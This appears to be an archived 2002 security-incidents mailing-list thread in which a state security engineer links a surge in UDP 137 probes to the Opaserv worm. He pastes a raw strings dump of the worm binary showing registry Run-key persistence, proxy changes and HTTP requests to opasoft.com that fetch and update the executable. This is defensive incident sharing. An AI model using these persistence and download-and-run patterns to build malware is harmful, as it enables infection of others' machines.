Security Incidents mailing list archives
RE: Unusual volume: UDP:137 probes
From: Richard.Grant () mail state ky us
Date: Tue, 1 Oct 2002 09:44:29 -0400
We had some internal machines that were contributing to the netbios flood attack. These machines were sniffed and from that we found a file on the identified machines named scrsvr.exe. The file was reversed engineered and the results are listed below. While some are attributing the netbios activity to Bugbear@mm it does not follow what we were seeing. It is known as W32.Opaserv.Worm. Comments? ScrSvr31415.KERNEL32.dll.RegisterServiceProcess.SOFTWARE\Microsoft\Wind ows\CurrentVersion\Run.Software\Microsoft\Windows\CurrentVersion\Interne t Settings.ScrSvr.ScrSvrOld.ProxyEnable.ProxyServer.\ScrSvr.exe.ScrSin.dat .ScrSout.dat.scrupd.exe.www.opasoft.com.GET http://www.opasoft.com/work/scheduler.php?ver=01&task=newzad&first=0 HTTP/1.1..Host: www.opasoft.com.....GET http://www.opasoft.com/work/lastver HTTP/1.1..Host: www.opasoft.com.....GET http://www.opasoft.com/work/scrsvr.exe HTTP/1.1..Host: www.opasoft.com.....POST http://www.opasoft.com/work/scheduler.php?ver=01&plain=0123456789ABCDEF& cipher1=0123456789ABCDEF&cmpmask=FFFFFFFFFFFFFFFF&key=123456&res=0 HTTP/1.1..Host: www.opasoft.com..... OK.PLAIN.CIPHER1.KEY.................................................... .................WINDOWS\scrsvr.exe..WINDOWS\win.ini.c:\tmp.ini.c:\windo ws\scrsvr.exe.,.windows.run.......................................... CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..!..LOCALHOST X..wO...?..................?......-@..*@..*@..*@..*@..*@..*@..+@..+@.&+@ .5+@.D+@.S+@.b+@.q+@..+@..+@..+@..+@..+@..+@..+@..,@..,@. ,@./,@.I,@.X,@..O......:.l.Y..xO....i!....~:.V.....o.8N.p!...[...z..O..[ ..l.5......c4.Z...~.K/..jM...8.....[..|}..5.o...'.\..N..o....}...5.\'.N. .B.t..a.P?.....K(....r....Yj4.......,i...=N.{S....\)..:{.A....mM.+.....> ..|R.h..K...4z...`..R.,./.Hj.....6.P..rr.N....-.l...5V.................. ....... .......91)!....:2*"....;3+#....<4,$?7/'....>6.&....=5-%................. ............................. !"#$%&'()*+,-./012345678.........................................)4.%/7. ..(3-!0..,1'8"5...*2$. .. .KERNEL32.dll.ADVAPI32.dll.USER32.dll.WS2_32.dll...LocalAlloc....GetCurr entProcess...ExitThread..d.SetFilePointer.. .ResetEvent....ReadFile..H.CreateMutexA....LocalFree...GetModuleFileName A..p.SetPriorityClass..[.SetEndOfFile....GetModuleHandleA....RegisterSer viceProcess../.GetPrivateProfileStringA..3.GetProcAddress....ExitProcess .4.CopyFileA...LocalReAlloc..M.CreateProcessA..'.CloseHandle...WaitForSi ngleObject...Sleep.T.CreateThread..@.CreateFileA...GetLastError..V.SetCu rrentDirectoryA.._.DeleteFileA...GetFileSize...WriteFile...WritePrivateP rofileStringA....lstrcat...lstrcmpi....lstrlen.t.GetWindowsDirectoryA... .RegSetValueExA....RegQueryValueExA....RegOpenKeyExA...RegDeleteValueA.. .RegCloseKey...PeekMessageA....DispatchMessageA..`.TranslateMessage..j.s ocket..f.send..d.recvfrom..c.recv..].inet_addr.S.gethostname.R.gethostby name.P.connect.O.closesocket.N.bind..?.WSAStartup..g.sendto....WSAGetLas tError...WSAEventSelect....WSAEnumNetworkEvents....WSACreateEvent....WSA CloseEvent....... .0*040.0.0.0.0.0.0.0.0.1 1'191E1a1.1.1.1.1.1.1.1.1.1.2.2!2&2L2U2j2.2.2.2.2.2.2.3.3 3.0.0j1.2V4o4v4.4.4.4.4.515k5.5.516.9.:9:.:.:.:.;.;.;.;$;.;8;?;O;h;~;.;. ;.;.<.<(<-<><R<d<y<.<.<.<.<,=T=c=.=.=M>s>~>.>.>.>.>.>.>.>.?.?"?a?q?.?... .. ..l....2:4.4.4.6.6.606H6Y6j6p6u6.6.6.6.6.6)757~7.7.7.7.7.7.7.7.7.8-868Q8 ]8x8.8.8.8.8.8.8.8.8.9.9&919F9O9Z9o9x9.9.9.9.9.9.9.9.9.9.9.9.9.9.:.:.:.: 1:<:S:u:.:.:.:.;1<t<|<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.=.=.=.=!=)=1=9=A=I= V=^=f=n=v=~=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.>.>.>$>,>4>;>A>F>N>j>x>.>.>.> .>.>.>.>.>.>.>.>.>.>.>.?"?0?>?F?Y?f?t?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.. ...0..X....0.0.0.0"0(0-050Q0_0m0x0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1(161A1 L1V1d1l1}1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.2.2.2.2"2*20262<2D2I2Q2W2]2c2{2 .2.2.2.2.2.2.2.2.2.2.2.2.2.3.3.3$3.343<3H3N3T3\3j3r3z3.3.3.3.3.3.3.3.3.3 .3.3.3.3.3.3.3.3.4.4.4.4%4-454=4E4M4U4[4a4g4o4t4|4.4.4.4.4.4.4.4.4.4.4.4 .4.4.4.5.5$5*50585@5F5L5R5X5]5e5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.6.6.6.6.6)6 1696A6I6Q6Y6a6i6q6y6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.7.7.7.7%7-747:7 B7K7S7[7a7f7l7v7~7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.8.8.8.8.8.8&8,848:8E8 I8P8X8`8h8p8x8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.9.9.9%9+91969>9Z9f9r9x9.9.9.9 .9.9.9.9.9.9.9.9.:.:.:.:.:::F:R:X:o:u:{:.:.:.:.:.:.:.:.:.:.:.:.:.:.;&;2; 8;O;U;[;a;f;n;.;.;.;.;.;.;.;.;.;.;.;.<.<.</<5<;<A<F<N<j<v<.<.<.<.<.<.<.< .<.<.<.<.<.<.=.=.= =(=0=7=D=P=^=u={=.=.=.=.=.=.=.=.=.=.=.>.>.>.><>J>R>k>s>{>.>.>.>.>.>.>.>.
.>.>.?.?.?.?<?J?R?k?s?{?.?.?.?.?.?.?.?.?.?.?...@..t....0.0.0.0<0J0R0k0s
0{0.0.0.0.0.0.0.0.0.0.0.1.1.1.1<1J1R1k1s1{1.1.1.1.1.1.1.1.1.1.1.2.2.2*26 2>2I2R2Y2f2l2t2|2.2.2.2.2.2.2.2.2.2.2.2.2.2.3.3%333<3D3W3e3m3s3}3.3.3.3. 3.3.3.3.3.3.3.3.3.3.4.4.4!4'4;4B4J4R4X4`4|4.4.4.4.4.4.4.4.4.4.4.4.5.5.5. 5&5B5P5^5f5.5.5.5.5.5.5.5.5.5.5.5.5.6!6+636;6A6P6l6w6}6.6.6.6.6.6.6.6.6. 6.6.6.7.7.7.7"7*797G7Q7]7d7i7o7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.8!8/8=8E8V 8\8b8h8p8x8.8.8.8.8.8.8.8.8.8.8.9.9"9(9.949:9G9O9k9w9.9.9.9.9.9.9.9.9.9. 9.:.:.:.:.:.:.;.;.;.;-;P;_;h;n;w;.;.;.;.;.;.;.;.<-<P<V<\<b<h<n<t<z<.<.<. <.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.=.=.=.=.="=(=.=4=:=@=F=L=R=X=^=d =j=p=v=|=.=.=.=.=.=.=.=.=...P..p....3.3.3.3.4.4.4.4.4.4.4.4 4$4(4,4044484<4@4D4H4L4P4T4X4\4.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?. ?.?.?...`..L....0.0.0.0.0.0.0 0$0(0,00080<0@0D0H0L0P0X0\0`0d0h0l0p0x0|0.0.0.0.0.0.................. Richard Grant [CNA, GSEC] Security Engineer Governor's Office for Technology Commonwealth of Kentucky Phone: 502-564-5792 Fax: 502.564.6856 richard.grant () mail state ky us Web: http://www.state.ky.us/got/ois/security/security.html
CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is
for the sole use of the intended recipient(s) and may contain confidential and privileged information. Any unauthorized review, use, disclosure or distribution is prohibited. If you are not the intended recipient, please contact the sender by reply e-mail and destroy all copies of the original message.
-----Original Message----- From: Emeric Miszti [mailto:emeric () uksecurityonline com] Sent: Monday, September 30, 2002 11:55 AM To: incidents () securityfocus com Subject: Re: Unusual volume: UDP:137 probes On Monday 30 Sep 2002 9:33 am, Mark Forsyth wrote:
On Monday, September 30, 2002 9:02 AM, John Sage [SMTP:jsage () finchhaven com] wrote:This has received some mention on the UNISOG list and elsewhere, but not here. Some people have been seeing unusually high volumes of UDP:137 probes since about 09/27/02 late, or early 09/28/02.A few people (who log sych things) on the Optus cable network in Australia
have been seeing it too. In my case since Sep 20 it's gone ... Sep 20 2 hits Sep 21, 22, 23 0 hits Sep 24 3 hits Sep 25 0 hits Sep 26 4 hits Sep 27 2 hits Sep 28 156 hits Starting at 02:20 (Aust. EST) Sep 29 410 hits Sep 30 406 hits up until 18:24
Been seeing exactly the same spike with same patterns. Up from 40 odd scans on 28/9/2002 to 495 already today. Incidents.org have picked this up at the Internet Storm Center http://isc.incidents.org/port_details.html?port=137 No explanations or reasons been given by anyone yet. -- Emeric Miszti UK Security Online http://www.uksecurityonline.com Tel No: 0870 088 5689 Fax No: 0870 706 2162 PGP Public Key available at http://www.uksecurityonline.com/emeric.asc ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com Inbound message certified virus free. ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- RE: Unusual volume: UDP:137 probes Bamm (Robert) Visscher (Sep 30)
- <Possible follow-ups>
- Re: Unusual volume: UDP:137 probes Nick FitzGerald (Sep 30)
- RE: Unusual volume: UDP:137 probes Mark Forsyth (Sep 30)
- RE: Unusual volume: UDP:137 probes Joseph R. Gruber (Sep 30)
- Re: Unusual volume: UDP:137 probes Hugo van der Kooij (Sep 30)
- SV: Unusual volume: UDP:137 probes Peter Kruse (Oct 01)
- Re: Unusual volume: UDP:137 probes Christopher Albert (Sep 30)
- RE: Unusual volume: UDP:137 probes Richard . Grant (Oct 01)
- RE: Unusual volume: UDP:137 probes Nick FitzGerald (Oct 03)
- Re: Unusual volume: UDP:137 probes Alain Fauconnet (Oct 04)
- Re: Unusual volume: UDP:137 probes Matt Power (Oct 05)
- RE: Unusual volume: UDP:137 probes Nick FitzGerald (Oct 03)
- RE: Unusual volume: UDP:137 probes Scott, Michael R. (Oct 01)
- Re: Unusual volume: UDP:137 probes Axel Pettinger (Oct 01)
- Re: Unusual volume: UDP:137 probes James Sneeringer (Oct 01)
- maybe a simple problem Andrew Fison (Oct 02)
- Re: maybe a simple problem Igor D. Spivak (Oct 02)
- RE: maybe a simple problem Greg Reber (Oct 03)
- Re: maybe a simple problem Brad Arlt (Oct 03)
- Re: Unusual volume: UDP:137 probes James Sneeringer (Oct 01)